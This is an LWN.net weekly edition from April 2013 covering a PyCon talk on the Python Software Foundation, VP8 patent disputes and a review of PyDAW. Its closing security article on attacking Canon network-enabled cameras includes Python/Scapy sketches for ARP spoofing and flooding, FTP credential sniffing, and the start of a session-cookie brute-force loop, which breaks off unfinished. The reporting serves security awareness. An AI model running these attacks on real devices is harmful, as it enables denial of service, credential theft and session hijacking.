
LWN.net Weekly Edition for April 4, 2013

PyCon: What does the Python Software Foundation do?

By Jake Edge
April 3, 2013

Sometimes, foundations and other organizing groups are almost invisible to the people that they serve. That can be a good thing in some ways, because it means that most of what the group does is running so smoothly that nobody notices the well-oiled machine humming away in the background. But there are downsides too, as people may not be aware of all of the opportunities for funding and other assistance that the organization can provide. Python Software Foundation (PSF) director Brian Curtin gave a talk at PyCon 2013 to try to ensure that the gathered "Pythonistas" at the conference were up to speed on the PSF.

[Brian Curtin]

Curtin started out by noting the visibility problem for the PSF. Most people know that it exists and perhaps a little bit about what it does. But there are things that PSF does that are not well known, so people are unaware of ways the PSF could help their projects. There are also activities that other groups are doing that could help the PSF. Basically, there is a bit of a disconnect between the PSF and others in the Python community. His talk was meant to bridge that gap.

The PSF is a 501(c)(3) US non-profit organization, which means that it is tax-exempt and that donations to it are tax deductible (in the US). It is made up of both individual members and sponsor members, which are organizations that make an annual donation to the PSF.

The PSF Mission Statement makes it clear that the organization is "for everybody", Curtin said. It is meant to support core developers, people writing Python code, people using Python programs, the people at PyCon, and so on. It is "big P Python", not just "/usr/bin/python on your latest MacBook", he said.

Part of PSF's mission is to promote the language, and events like PyCon are one way to do that. There were also a variety of tutorials surrounding PyCon that promoted the language to children and to programmers who use other languages. Protecting the language is another piece of the mission. That includes protecting the Python trademark, for example, as it recently did in a European dispute. It also involves maintaining the PSF license for Python. The final piece of the mission is to "advance" Python. That effort is partially to fund Python development, but there is more to it than just core development. It is meant to push the Python community forward through funding a variety of activities.

Who is the PSF?

The 200+ individual members of the PSF were nominated by existing members based on their efforts to "promote, protect, and advance Python". Beyond just core developers, the list includes community and conference organizers, developers of Python web frameworks, evangelists, and so on. It is people who are "trying to make the Python world better".

There are also roughly 30 sponsor members, who are companies or organizations that like and use Python. Those members donate annually because they believe in the mission of the PSF. They see a great benefit from being able to freely download and use Python throughout their organization. In return, the PSF tries to keep the Python world running smoothly so that those organizations can continue to be successful.

There are several PSF committees—made up of both members and others from the community—that are charged with handling a specific piece of the PSF's mission. For example, the Sprints committee is responsible for helping fund development sprints. Originally, sprint funding was focused on CPython (the C language Python core), but that has changed. Now, anyone who is "making Python better through code" is eligible for funding. The committee has funded PyPy and Django sprints as well as efforts to create new web sites for user groups.

Typically, the money is used to buy food or rent meeting space, but other things are possible too. The Cape Town users group was one of the first to use PSF sprint funding. It used the funding to make socks and coffee mugs with the Python logo for sprint participants, who went on to do a lot of work to make matplotlib and Genshi work on Python 3.

There is an Outreach and Education committee which does much of what its name would imply: funding educational and community-building efforts. The Trademark committee looks after the Python trademark. It was instrumental in resolving the recent European dispute, but more generally works to ensure that user groups and others are following the trademark policy. There is also an Infrastructure committee that handles the web servers for python.org, the Python wiki, the Mercurial repository, and so on. The PSF has recently added two part-time system administrators to help keep the infrastructure running well.

PSF grants

The PSF also grants money for specific projects. For example, Kivy, NLTK, and Pillow were recently granted funding to complete specific features or releases. In the past, the PSF funded Brett Cannon to create a Python developer's guide to help get new contributors up to speed.

[Some sponsors]

Conference grants are another big part of what the PSF spends its money on. In 2012, it granted $33,000 to 18 conferences in 15 countries. It wants to help other conferences "all over the world" grow to be more like PyCon. The smaller conferences have trouble attracting sponsors sometimes (unlike PyCon, which had multiple chock-full sponsor pages), so the PSF helps out. Curtin said that the PSF plans to double its contributions to each of the conferences for 2013.

The Sprints and Outreach committees both have their own budgets, so they can make funding decisions without needing to go to the board of directors for money. Sprints has a $5000 annual budget, and will reimburse expenses up to $300 for approved sprints. It "works well and people like it", he said, and the committee would like to see it grow. He gave a long list of sprints that had been funded all over the world. There have been a lot of repeat groups applying for funding, which is good, but the committee would like to see new groups representing new geographical areas apply. The Outreach committee has funded a wide variety of workshops and other activities including PyStar Philly, PDX Python, PyCamp Argentina, and more.

The PSF also gives out awards to give back to contributors, so that they know their work is appreciated. There are two community service awards given each quarter, which include either a $500 check or free PyCon registration plus up to $500 travel reimbursement. The Frank Willison memorial award is given yearly at OSCON to an outstanding Python contributor, and is awarded by O'Reilly Media based on a recommendation from the PSF. In 2012, the $5000 distinguished service award was added to recognize "sustained and exemplary contributions" to Python. The inaugural award was made posthumously to matplotlib creator John Hunter.

The PSF is always looking for more ways to advance "big P" Python. It is currently "kicking around" some ideas on how to serve local Python communities better, perhaps by way of regional representatives to the PSF. That would help ensure that word about what assistance the PSF can provide gets out to all of the local groups that could take advantage.

In order to have money to give away, the PSF has to raise money. PyCon is the biggest fundraiser for the organization, but the sponsor members also help replenish the funds as well. There is a (non-voting) associate member class for those who donate to the PSF. Curtin would like to see that program built up and to make it more attractive for people to contribute that way with T-shirts or other incentives. He ended his talk with a pair of questions: Can the PSF help you? Can you help the PSF? He encouraged anyone with ideas in either direction to contact the PSF.

PyCon wrap-up

If PyCon is the major fundraiser for the PSF, it seems likely to have a long and prosperous future ahead of it. This was my first visit to PyCon (with luck, not my last) and it is an impressive conference. Lots of excellent technical talks, with an engaged and excited community in evidence. Getting 2500 enthusiasts together in one place for a few days will do that.

[Expo floor]

One fear when attending a conference with an "expo hall" is that it will have gone down the path of LinuxWorld (or the RSA Conference and other large "industry" conferences), where much of the content is targeted at executives and other non-technical folks. Those kinds of conferences have their place, I suppose, but they don't offer much in the way of intellectual stimulation. PyCon was certainly not that kind of conference, though it had a large contingent of company and organization booths. While I didn't spend much time on the expo floor, it was always crowded with attendees.

While PyCon 2013 will be known to some because of an unfortunate incident that occurred, that incident does not typify the conference at all. In fact, it is clear that PyCon (and the PSF) have made great strides in trying to even out the gender imbalance typically seen at free software conferences. Of the 116 talks in six tracks, 22 were given by women. That ratio is roughly the same as that of the conference as a whole, which was 20% women. Progress has certainly been made; one can only hope more will be.

There were lots of talks that I sat in on but wasn't able to write up and even more that I wasn't able to sit in on at all. There is a whole lot going on in the Python world and that is clearly reflected in the conference lineup. For anyone with an interest in the language, PyCon 2014 (in Montréal, Canada) should get strong consideration.

Comments (none posted)

The VP8 wars heat up ... again

By Nathan Willis
April 3, 2013

Just when it seems like the Internet is done fighting about video codecs, another salvo is fired. Google recently announced an agreement with the codec patent holders at the MPEG Licensing Authority (MPEG LA) that allowed Google and all other third parties to use Google's VP8 codec without fear of MPEG LA's patent infringement claims. The agreement was a major win for VP8, and soon afterward momentum picked up to push for VP8's adoption in a variety of web standards. But shortly after the announcement, Nokia jumped into the fray, asserting that it had numerous patents on which VP8 infringed, and that it would not license them. There is no telling where the Nokia incident will head, but on the heels of its victory in the MPEG LA fight, Google may be unlikely to back down.

History lesson

As a refresher, MPEG LA is a consortium that sells licensing agreements for various multimedia codecs; member companies contribute their relevant patents to a "pool," then MPEG LA sells one-stop indemnification against patent infringement lawsuits based on those contributions. Despite its confusingly similar name, MPEG LA is not affiliated with the Moving Picture Experts Group (MPEG), which is a joint ISO/IEC working group that produces media compression specifications.

In recent years, MPEG LA's highest-profile cash cow has been the H.264 video codec. In 2009, H.264 proponents successfully lobbied to keep the open-source Theora video codec from being named as a "mandatory to implement" (MTI) part of the HTML5 standard. Arguably in response to the threat posed by Theora, MPEG LA agreed to make H.264 decoders royalty-free for video that is delivered over the Internet for free to end users. That meant that non-subscription services like YouTube could deliver H.264-encoded content to users without the users needing to shell out any cash, but it still left plenty of opportunities for royalty collection by MPEG LA, including for-pay video services, physical media like Blu-ray discs, and video encoders.

Theora was derived from a codec called VP3, which was developed by codec shop On2 Technologies and was released as open source in 2002. VP3's code was donated to the Xiph.org Foundation along with a royalty-free patent grant. In 2009, Theora was quite a bit older than H.264, but its real selling point was its royalty-free nature. Still, H.264 proponents included MPEG LA members who both profit from H.264 licensing and make web browsers (such as Microsoft and Apple), and they claimed that Theora was both technically inferior to H.264 and infringed on MPEG LA patents, too.

The HTML5 video codec argument ended in a stalemate with neither codec becoming enshrined in the specification, but Google changed the tenor of the entire debate in February 2010, when it purchased On2 for US $124 million. On2 had released several codecs since VP3/Theora, including one called VP7 that it claimed was superior to H.264. In May 2010, Google released the next generation codec VP8 under a BSD-style license, along with an irrevocable royalty-free patent grant to all of the company's VP8 patents, under the banner of the WebM media format (which uses VP8 for video and Vorbis for audio).

But the VP8 patent grant did not deter MPEG LA; immediately after Google's announcement, the group said that it was looking into forming a patent pool around VP8. In February 2012, it asked for contributions to a VP8 patent pool, and in May announced that 12 companies had responded.

March madness

Despite MPEG LA's triumphant announcement, it never actually unveiled a public VP8 patent pool (if that is what one does with a pool). Nor did it initiate any patent infringement litigation against Google or anyone else. Prior to March 2013, the only major news event around VP8 or H.264 was Mozilla's controversial decision to enable H.264 decoding on certain platforms by passing decoding duties down to hardware decoders. At the time, Mozilla's justification was that its efforts were better spent ensuring that royalty-free codecs would be adopted in newer standards like WebRTC. Indeed, WebRTC arrived in February 2013, with VP8-based interoperability implemented by Mozilla and Google.

Thus, it came as a bit of a surprise on March 7 when Google announced that it had reached an agreement with MPEG LA about VP8. The full terms were not made public, but the announcement said that Google had been granted licenses to the MPEG LA patents that "may be" essential to VP8, and that MPEG LA would discontinue its VP8 patent pool.

The terseness of the announcement led to considerable speculation online; some even assumed that Google had paid a licensing fee to MPEG LA for some or all of the infringing patents. But the language of the announcement is weighted entirely in Google's favor:

... agreements granting Google a license to techniques that may be essential to VP8 and earlier-generation VPx video compression technologies under patents owned by 11 patent holders. The agreements also grant Google the right to sublicense those techniques to any user of VP8, whether the VP8 implementation is by Google or another entity. It further provides for sublicensing those VP8 techniques in one next-generation VPx video codec. As a result of the agreements, MPEG LA will discontinue its effort to form a VP8 patent pool.

Specifically, the grant covers all of VP8's predecessors, covers its next iteration (which is already under development), applies to any implementation of VP8 (whether derived from Google's or not), and leaves Google free to sublicense the patents to third parties at will. Xiph.org's Christopher Montgomery summed up the agreement as "Google won. Full stop." After the announcement, Google's Serge Lachapelle elaborated on the agreement in an email to the W3C's rtcweb mailing list, saying that Google "intends to license the techniques under terms that are in line with the W3C’s definition of a Royalty Free License" in the coming weeks, and adding that the agreement with MPEG LA "is not an acknowledgment that the licensed techniques read on VP8."

Since patent licensing is MPEG LA's sole reason for existing, it is indeed difficult to hypothesize a set of secret conditions that would amount to the agreement being a favorable outcome for its side. A lot of technology companies end their patent disputes with a "cross-licensing" agreement, which amounts to a pact to not sue each other over the patents, but allows both companies to continue to wield them against others. Google certainly has a patent portfolio; a Google–MPEG LA agreement of this form would be plausible, but there is no mention of cross-licensing. If it was part of the deal, it is strange that MPEG LA would not mention it, considering that its business hinges on such licensing deals. Similarly, it is unknown whether a cash payment by Google was involved; if so, such a payment would have to be sizable indeed for MPEG LA to potentially undermine its own future business interests by walking away from the fight with nothing to show for it publicly.

Another possible scenario is that the primary reason for the agreement was that Google privately demonstrated something even more harmful to MPEG LA, such as invalidating some key MPEG LA patents, or disclosing patents of its own that pose a serious threat to one of MPEG LA's key properties. Cash might or might not have greased the wheels of deal-making. Alas, it is doubtful that we will ever know for sure so long as corporate lawyers roam the earth.

Many in the web standards bodies, meanwhile, were so relieved to hear of the deal that they quickly rallied to promote VP8 and WebM. Lachapelle proposed that VP8 be adopted as WebRTC's MTI codec. Codec expert Rob Glidden reported that Google had also submitted VP8 for consideration in MPEG's still-under-development Internet Video Coding (IVC) standard. Steve Faulkner even proposed reopening the issue of including an MTI video codec in HTML5.

Oh yeah; Nokia

VP8's rosy future hit an abrupt obstacle a few days later, however. As Pamela Jones at Groklaw reported, a Nokia representative interrupted a Google talk about VP8 at a recent IETF meeting to announce that Nokia owned a number of patents upon which VP8 was infringing, and that it would not license them. Nokia put its claim on file with the IETF, listing 64 patents in various jurisdictions (many of which are simply jurisdictional duplicates of the same invention claims) plus 22 pending patent applications. A few news sites noted that MPEG LA's tally of prospective VP8 patent-poolers was 12, and that only 11 companies were mentioned in the Google–MPEG LA agreement; perhaps, then, Nokia was the holdout.

Whether or not it was the missing party is tangential; the real questions are whether the claimed patent infringements are legitimate, and what Google will do about them. Jones broke down the list of patents and removed the duplicates, then called for a search to turn up prior art. That is certainly one approach that might yield results. Another would be for Google to perform a thorough investigation and decide that some or all of the patents do not apply; as Thom Holwerda at OSnews observed, that is the approach Xiph.org took when a similar patent infringement charge was raised over the Opus audio codec—which was subsequently cleared by the legal review team and approved as WebRTC's MTI audio codec.

The odds are that Google's legal department has already conducted a pretty detailed examination of VP8, of course. So it is hard to say what the next move will be. WebM project manager John Luther pointed out that there was never any lawsuit nor finding of infringement in the MPEG LA case. He called it a distraction, and said that the project unfortunately had to keep quiet while the talks were in progress. So we may not hear much more from Google on the subject of Nokia's claims until Nokia files a lawsuit or another surprise announcement reveals how it all turns out.

For the time being, arguably the most puzzling aspect of this latest development is the fact that Nokia is wading into the argument in the first place. There is plenty of speculation as to why—every theory from puppetry on behalf of Nokia's business partner (and H.264 proponent) Microsoft to a gamble that Google will pay the financially troubled Finnish phone maker to make the problem go away.

Of course, Google already knows if Nokia was the mysterious twelfth member of the defunct MPEG LA patent pool, and, if it was, then Google has known about its patents for quite some time. But either way, nothing stops any other company from springing a similar attack on VP8 or any other codec. In the battle to make VP8 an MTI standard in any web specification, the parties that benefit from license sales of rival codecs have no incentive to cooperate. That goes for H.264 as well as for the next generation, and it is not merely a hypothetical problem. Apple's Maciej Stachowiak has already voiced his objection to making VP8 an MTI standard in HTML5. The agreement between MPEG LA and Google has smoothed over the issue of VP8's patent status, but it cannot perfectly resolve it, simply because nothing can.

Comments (35 posted)

A look at PyDAW

April 3, 2013

This article was contributed by Dave Phillips

Linux offers a great many components from which a powerful digital audio workstation (DAW) can be built. But, as an heir to the UNIX design philosophy of modularization, Linux does not offer much in the way of high-level, monolithic audio applications. Thus, an electronic musician coming into Linux from Windows may have a difficult time piecing together and configuring a self-contained audio production environment. Composer/developer Louigi Verona has written extensively about the trials and tribulations of his own switch to Linux, and would-be converts are well-advised to study Louigi's notes and commentary before taking the plunge.

Developer Jeff Hubbard wants to provide a solution to this problem with his PyDAW project, a singular environment for the Linux-based musician working in contemporary electronic music. PyDAW supports audio/MIDI sequencing in a well-designed GUI that includes a piano-roll interface for MIDI event entry, an audio sample editor, and a set of graphical editing tools for designing control curves for various integrated sound parameters. An audio mixer, a suite of instruments, and a set of signal processors round out PyDAW to make it a self-contained system for producing electronic music with Linux.

PyDAW has been designed to appeal to users who want to avoid the difficulties presented by excessive modularity. No external plugin architecture is supported, and the author has indicated that its JACK deployment may be discontinued in favor of direct communication with ALSA. While these decisions may seem heretical to other Linux audio developers and users, they proceed from PyDAW's basic design philosophy, i.e. to provide a complete system for immediate and uncomplicated use by musicians working in a specific genre.

PyDAW requires modern hardware, and its performance reflects the host machine's capabilities. A sufficiently powerful laptop is usable, but the author prefers a desktop system equipped with an audio interface designed for high-quality sound. A dual-core 64-bit CPU with 4G of memory is the baseline for adequate performance; a quad-core system with 8G of memory is recommended. An eight-core or better system with 16G of memory would be optimal for fully exploiting PyDAW's capabilities.

You can download PyDAW in pre-built versions for Ubuntu and other deb-based systems, as a source tarball for a local build, and in an ISO image for a bootable DVD or USB stick. The bootable images include a plain-vanilla Ubuntu 12.04 for AMD64 systems, PyDAW's target Linux distribution.

A Git repository is also available for anyone with an interest in the project's most recent development. Building PyDAW is uncomplicated, with minimal and readily available dependencies, though it should be noted that the project expects Python 2. To be clear, Python is required for the program's PyQt4 user interface bindings. The DSP components — synths, fx, sampler, etc. — are written in standard C, with their Qt4 GUIs written in C++. PyDAW is licensed under GPLv3.

Unfolding PyDAW

PyDAW is a work in progress, with a fast rate of development, so be aware that the descriptions here are subject to change. This review is based on versions from the 12.xx series through 13.03-8. Subsequent versions may change the program's internal and/or external aspects significantly. See the PyDAW Web site for current information about project development and the latest release.

[PyDAW main screen] The program opens to the main arrangement screen seen to the right. The top menu bar offers some basic file operations, an offline rendering dialog, a theme manager, and links to the program's Web site and online manual. Immediately below the top menu we see the PyDAW transport and tempo controls, the active region and loop mode indicators, and the MIDI input port selector. Beneath the transport control bar we see six editor tabs, with the Song/MIDI tab set as the default. The top row of the Song/MIDI tab presents a series of empty grey boxes, numbered 0 through 12. Click any box to open the region creation dialog.

Double-click on an item to open the default item editor, a "piano-roll" display for MIDI events recorded from an external device or entered manually. Other editors include GUI and numeric list displays for designing envelopes for parameter controllers, pitch-bend, and velocity values. Multiple items can be edited as a single item — a very cool workflow amenity — with all editors expanded to the specified range.

The CC Map tab displays the default MIDI controller assignments. Controller maps have been prepared for PyDAW's instruments and processors, another workflow amenity that speeds up the design and application of gain curves for synthesis/processing parameters such as filter cutoff frequency, volume control, and low-frequency oscillator (LFO) modulation depth.

For its internal sound sources PyDAW comes equipped with two synthesizers. Ray-V is a virtual analog synthesizer constructed in a standard architecture with a single-panel UI for uncomplicated programming. However, there's nothing missing from its design: Ray-V provides two oscillators with four source waveforms, filter and amplitude stages with ADSR envelopes, a pitch envelope, noise and distortion generators, an LFO, and a master mixer section with controls for glide and pitchbend. Ray-V's presets indicate its possibilities in a set of synthesizer pads, leads, and percussion sounds.

Way-V is PyDAW's wavetable synthesizer. Sixteen waveforms are available to each of Way-V's two oscillators; the output from the oscillators is sent to their optional ADSR envelopes, moves on to a non-optional master ADSR, and finally reaches the master mixer. The mixer includes glide and pitchbend controls, and a noise generator is available. The PolyFX processing module mixes the synthesizer's output with up to four effects processors, sending the blend on to PolyFX's own LFO and two ADSR output envelopes. Alas, Way-V includes no preset patches, but new sounds can be created quickly and easily. With my laziest method I merely select different wave types for the default patch. In a more energetic mood I apply and modify Way-V's other parameters for more complex sound design.

[PyDAW modulex] Per-track effects processing is managed by the Modulex multi-effects device. Up to six processors can be applied, with available modules for nine filter types, two distortions, a limiter, an equalizer, and a panner. Two pre-defined modules are also available for reverb and a tempo-synchronized delay line.

A caveat for the unwary: MIDI track definitions (instrument, FX, level, state, solo/mute status) persist from region to region. Item definitions behave similarly, with changes in an item applied to all instances of the item, i.e. the original and its copies in any regions. Fortunately, items can be "unlinked" for individual edits, but the user is advised to learn what's fixed, what's flexible, and the default status of objects in the PyDAW UI. Hint: Right-click on a region or item to see available operations.

At the macro-composition level PyDAW's tools promote a rapid workflow. Regions and items can be copied and moved singly or as a group, and playback can be looped to region or item bar, allowing realtime arrangement of your material. By the way, items can be copied and pasted between regions, also in realtime.

[PyDAW audio sequencer] Audio content can be set into a track either by employing the Euphoria sampler, by recording new audio directly, or by using the audio sequencer (seen to the left). Euphoria supplies the expected sample file handlers — load/save, MIDI key assignment and range, sample tuning, MIDI velocity sensitivity — and provides a hook to the Audacity soundfile editor for more detailed editing. The audio sequencer's Viewer tab is especially useful for arranging recorded material in arbitrary patterns, with snap-to available for bar/region boundaries (or not at all). Double-clicking on a waveform in the Viewer or single-clicking anywhere in the Item List invokes PyDAW's built-in sample editor, a limited-by-design utility for quick and easy work with time-stretching, pitch-shifting, and setting loop points.

The Tracks tab provides a virtual audio mixing board with five input strips and five buses (master plus four). Input can be routed to any of the eight tracks, each of which has its own bus selector, solo/mute switches, and effects processing. PyDAW isn't designed to be a first-choice application for recording and mixing by electroacoustic instrumentalists, but the facilities are there if needed and they are certainly useful for the creation of new sound samples.

A word about PyDAW's offline rendering: The dialog presents good defaults, the process is very fast, and the output format is an acceptable 32-bit stereo WAV file. That's the word, short and sweet.

Using the program

Initial workflow proceeds from the top downwards, from Region to Item to Event. Objects are invoked quickly to sustain creative momentum — left-click in the Region/Item areas to invoke those objects, right-click to open their available operations — and many edits can be accomplished with commonly-used keyboard accelerators (Ctrl-C to copy, Ctrl-V to paste, Del to delete). Mouse behavior depends on the active editor. For example, group selection in the piano-roll grid is made by holding down the Ctrl key while sweeping with the mouse with any button held down. In the continuous controller and Pitchbend editors it isn't necessary to hold the Ctrl key while making the selection, again with any button pressed.

PyDAW allows any number of sequential Items to be edited as a group. The piano-roll and the continuous controller displays will reflect the decision and show the increased time period. A similar feature allows arbitrary grouping of items for copy/paste operations, a welcome device when creating complex arrangements from multiple items across multiple regions.

I had no problems with basic operations in the PyDAW audio sequencer. Audio clips are arranged on a region-assigned timeline, i.e. the clips play along with the passage of the Song's regions. They can be snapped to bar or region boundaries, or they may be freely placed on the timeline. Only one audio item is allowed per line, and only horizontal replacement is permitted. Double-clicking on an audio clip in the audio sequencer will invoke a basic editor for massaging your sound samples. The editor is intentionally feature-limited, with particular attention given to setting loop points, stretching or squashing the sample length, and changing its pitch. Again, all operations are easy to access and can be applied quickly.

Fizz-pluck-bang [MP3] is a short demonstration piece made with PyDAW 13.03-6. With the exception of one problem getting my laptop's internal microphone to work, all my objectives were met in the piece. I created MIDI sequences in the piano-roll editor that drove sound samples in Euphoria and synthesis patches in Ray-V and Way-V, I added drum loops with the audio sequencer, and I applied a simple volume control curve for one of the synthesizers. Macro-level formation was made simple with PyDAW's easy arrangement of Regions and Items, and the offline rendering was flawless.

The PyDAW author has suggested some recommended settings for improving PyDAW's performance with JACK. Discontinuities in the audio stream can be reduced by switching off JACK's realtime option and raising its buffer period size. Latency will increase, but performance is more stable. Until PyDAW is rewritten for direct connection to ALSA I suggest following Jeff's advice, with a little experimentation with your JACK settings to find the happiest numbers.

The documentation

Documentation currently consists of the online manual, a wiki, and a forum for exchanges between users and developers. The online docs may not be up-to-date with the latest changes, so it's a good idea to join the forum where Jeff and his associates are quick to respond to reports and suggestions. Jeff is also available on the PyDAW forum at KVRaudio.

For more examples of music made with PyDAW, check out the PyDAW Music page on SoundCloud. New works are also announced on the KVR forum.

TODO

PyDAW can stand improvement in some areas. More presets for the Ray-V synthesizer would be nice; any presets for Way-V would be nicer. Cut/copy/paste and multiple selection would be welcome in the audio item display, the audio sequencer could be more flexible, documentation needs some love, and a metronome would be helpful. Fortunately Jeff works to fix PyDAW's most egregious bugs as quickly as possible, and I must note that I've encountered no show-stoppers in recent releases.

Personals

I tested PyDAW in three settings. I built it from source code on uniprocessor machines running Arch 64 and KXStudio (Ubuntu 12.04 in i386 mode), platforms clearly underpowered for PyDAW, with predictably poor performance. As I recommended earlier, you'll need a multicore CPU, preferably in native 64-bit mode, with at least 3G memory, to experience PyDAW's full capabilities.

Incidentally, it is worth noting that more audio software is demanding the power of multicore hardware. Harrison's Mixbus and the upcoming Bitwig Studio both require a multicore machine, and explicit support for multiprocessor hardware is present in Ardour3 and Csound.

My best-case reports come from running PyDAW on a dual-core laptop. I built and ran the program under KXStudio (again in i386 mode), and I also ran it from a bootable USB stick created with the 64-bit ISO image from the PyDAW SourceForge site. I followed Jeff's suggestions for improving performance by taking JACK out of realtime mode and increasing its buffer size. My tests weren't realtime-critical, and the higher latency was worth the more pleasant experience while learning how to use the program.

Outro

As stated earlier, PyDAW may not be for everyone, but it will surely appeal to many contemporary computer-based musicians. If you're into EDM and other electronic styles you should check it out, with the full understanding that the project is still in development (PyDAW v.3 is already in progress). The author wants to know about any bugs or unexpected behavior you encounter in his program; you can reach him on the KVR forum and on the PyDAW wiki.

Comments (1 posted)

Page editor: Jonathan Corbet

Security

Exploiting network-enabled digital cameras

By Nathan Willis
April 3, 2013

Consumers can now add digital cameras to the list of purchases that come with built-in networking functionality, which means said cameras can also be added to the list of items at risk of being compromised or disabled by remote attackers. Two security researchers presented a talk at ShmooCon 2013 in February detailing a series of attacks against high-end Canon digital cameras. While the speakers did not address a wide range of manufacturers, they were able to access and control the Canon camera with very little effort. Part of the vulnerability stems from poor security engineering on the camera-maker's part, but part of it is baked into the feature set.

Speakers Daniel Mende and Pascal Turbing are both researchers at German IT security firm ERNW. They presented their talk ("Paparazzi over IP") on February 16, although it made headlines in late March when the video from the session was publicized by Help Net Security. Mende and Turbing set out to compromise an EOS 1D X digital SLR (DSLR), Canon's current flagship model, retailing at just under US $7000. The 1D X includes built-in Ethernet connectivity that is used to enable many of the same features typically run over USB in less expensive models: file download, browsing and deleting images, tethered shooting, and so on. It also sports an accessory port, to which a Canon-made WiFi dongle can be attached.

The target

Mende and Turbing were able to successfully mount a number of attacks against the camera, resulting in denial of service, man-in-the-middle attacks which could disclose or delete camera information, and hijacking authorized network sessions. The camera offers several means for accessing the contents of its memory cards remotely (which is rarely a feature desired by the security-conscious), but its remote-control functionality (i.e., tethering the camera to a computer) was insecure, too. At the moment, the team admits, only high-end Canon models are affected by their findings, but network functionality is found in high-end Nikon hardware as well, and virtually all manufacturers are bringing networking to their less expensive camera offerings.

Mende and Turbing noted that the 1D X included a more-or-less complete IPv4 stack, which allowed for attacks at several networking levels. They attempted a few of them, they said, but devoted the majority of their time to the more interesting challenge of attacking the custom services offered by the camera. But they did mention a few attacks that would prove useful later on.

At Layer 2, for example, they pointed out that both ARP spoofing and ARP flooding were possible. By spoofing ARP packets from anywhere else on the same Ethernet segment or WiFi network, an attacker could intercept any traffic between the camera and a computer and get man in the middle access. They also noted that the embedded controller has very little memory, so a denial-of-service was possible by sending the camera just 100 ARP packets per second. At the TCP/IP layer, mounting a TCP reset attack was similarly trivial.
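
For illustration, a minimal Scapy-based sketch of those two Layer 2 attacks might look like the following. This is not the researchers' tooling; the addresses are made-up placeholders, and the 100-packets-per-second figure simply echoes the number quoted in the talk.

    # Hypothetical sketch of ARP spoofing and ARP flooding with Scapy.
    import time
    from scapy.all import ARP, RandIP, send

    CAMERA_IP = "192.168.1.50"     # placeholder camera address
    VICTIM_IP = "192.168.1.10"     # placeholder workstation address

    def arp_spoof():
        # Claim both IP addresses with our own MAC (op=2 is an ARP reply),
        # so camera<->workstation traffic flows through the attacker.
        send(ARP(op=2, psrc=VICTIM_IP, pdst=CAMERA_IP), verbose=False)
        send(ARP(op=2, psrc=CAMERA_IP, pdst=VICTIM_IP), verbose=False)

    def arp_flood(rate=100):
        # The camera's controller has little memory; roughly 100 bogus
        # ARP packets per second was reportedly enough to knock it over.
        while True:
            send(ARP(op=2, psrc=str(RandIP()), pdst=CAMERA_IP), verbose=False)
            time.sleep(1.0 / rate)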

Canon at your service

Naturally, the whole point of including a built-in TCP/IP networking stack in the camera is for the manufacturer to run services over it. As Mende and Turbing explained, the 1D X offers four networked services: FTP Upload mode, Digital Living Network Alliance (DLNA) mode, Wireless File Transmitter (WFT) Server mode, and EOS Utility mode. In FTP Upload mode, images shot by the camera are automatically uploaded to a pre-configured FTP server (which could be a very important feature for photojournalists in dangerous locations or under time pressure); DLNA mode is also used for network access to the images on the camera, but by providing a general-purpose DLNA media source that other DLNA products can easily discover and read from.

The final two modes offer control of camera functions. In WFT Server mode, a built-in web server provides browser-based access to tethered shooting functionality, while EOS Utility mode offers more or less the same functions by connecting the camera to Canon's desktop camera control application. The tethering capabilities of the two modes are essentially the same, and are often used in studio photography set-ups. All four networking modes, it should be noted, must be activated on the camera, and cannot be switched on remotely, a limitation which does provide some protection for the camera owner.

FTP Upload mode allows the shooter to relay images to a remote server as they are taken; this could be useful (for example) for photojournalists in the field when time is of the essence. The FTP server address and its authorization credentials must be entered manually on the camera's configuration menu, so completely hijacking an unattended camera is not possible. However, as is common knowledge, FTP credentials are transmitted in the clear, so the entire session can be sniffed; when used in conjunction with the ARP spoofing attack mentioned earlier, an attacker could even spoof the FTP server side of the connection entirely.
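
As a concrete (and hypothetical) illustration of how little effort that takes, a passive sniffer for FTP credentials fits in a few lines of Scapy; combined with the ARP spoofing sketched above, the attacker does not even need to sit in the natural network path.

    # Sketch: watch for FTP USER/PASS commands on the local segment.
    from scapy.all import sniff, IP, Raw

    def show_creds(pkt):
        if pkt.haslayer(IP) and pkt.haslayer(Raw):
            line = bytes(pkt[Raw].load).decode("latin-1", "replace").strip()
            if line.upper().startswith(("USER ", "PASS ")):
                print("%s -> %s : %s" % (pkt[IP].src, pkt[IP].dst, line))

    sniff(filter="tcp port 21", prn=show_creds, store=False)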

DLNA mode is no more secure, and again it is the underlying protocol that is to blame. DLNA is designed for consumer electronics used in the home; there is no real attempt to make connections or service discovery private or secure. DLNA devices broadcast their network address over UPnP, and they offer up all of their content to other DLNA devices (in theory, "renderers"—media player front-ends like TVs) over HTTP. There is no authentication or access control. Anyone on the same network segment can see the UPnP advertisements sent out by the camera, and can access all of its stored media.
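
Finding such a camera requires nothing more than the standard SSDP discovery request that any UPnP client sends; a minimal sketch is below. The multicast address and port come from the UPnP specification, and nothing Canon-specific is assumed.

    # Sketch: discover UPnP/DLNA devices (including a camera in DLNA mode)
    # on the local network via an SSDP M-SEARCH, then print who answered.
    import socket

    MSEARCH = "\r\n".join([
        "M-SEARCH * HTTP/1.1",
        "HOST: 239.255.255.250:1900",
        'MAN: "ssdp:discover"',
        "MX: 2",
        "ST: ssdp:all",            # ask every UPnP device to respond
        "", ""])

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(3)
    sock.sendto(MSEARCH.encode("ascii"), ("239.255.255.250", 1900))

    try:
        while True:
            data, addr = sock.recvfrom(65507)
            # Each response carries a LOCATION: header pointing at the
            # device description; a DLNA client can browse media from there.
            print(addr[0], data.decode("ascii", "replace").splitlines()[:4])
    except socket.timeout:
        pass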

WFT mode and EOS Utility mode both offer a bit more of a security story, but both of them have grave flaws. WFT mode uses a tiny built-in web server to deliver a JavaScript-powered web application to the browser, Mende and Turbing reported. The server uses HTTP basic authentication, and stores a session identifier (of the form sessionID=40b1) as a plaintext cookie on the authenticated browser. A man in the middle can sniff this transaction, they said, but the session ID is also a mere four bytes in length. If a user is logged in, someone else can connect to the web server and guess the cookie value with brute force—Mende and Turbing wrote a six-line Python script that could brute-force the session ID in about twenty minutes (depending on how busy the camera is). There is no notification to the logged in user that someone else is impersonating the session.
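
A brute-force loop of that sort is indeed only a few lines of Python. The sketch below iterates over the 65,536 possible values of a four-character hex cookie like the "40b1" example from the talk; the camera address, probed path, and response behavior are assumptions for illustration, not details from the presentation.

    # Sketch: guess the WFT server's short sessionID cookie by trying every
    # four-hex-digit value until a request stops being rejected.
    import requests

    CAMERA = "http://192.168.1.50"   # placeholder camera address
    PATH = "/"                       # any page that requires a valid session

    def find_session_id():
        for guess in range(0x10000):
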